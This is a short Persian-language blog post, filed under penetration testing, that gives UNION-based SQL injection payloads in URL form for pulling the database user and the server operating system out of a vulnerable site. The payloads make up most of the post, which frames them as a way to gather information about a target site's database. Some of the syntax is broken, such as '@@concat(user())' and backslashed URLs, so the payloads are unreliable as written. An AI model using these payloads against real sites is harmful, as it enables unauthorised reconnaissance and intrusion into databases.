به نام خدا


در اینحا دستوراتی را می آوریم که به وسیله آنها می توانید اطلاعات بیشتری را در مورد دیتایبس و موارد دیگر سایت بدست بیاورید .



دستور concat(user()با اضافه کردن این دستور در ستون آسیب پذیر یوزر دیتابیس نشان داده می شود.

http:\\www.site.com/......select+1,2,@@concat(user()),3,4--


دستور @@version_compile_os با اضافه کردن این دستور در ستون آسیب پذیر نوع سیستم عال نشان داده می شود .


http:\\www.site.com/......select+1,2,@@version_compile_os,3,4--


نوشته شده در تاریخ چهارشنبه 5 اسفند 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()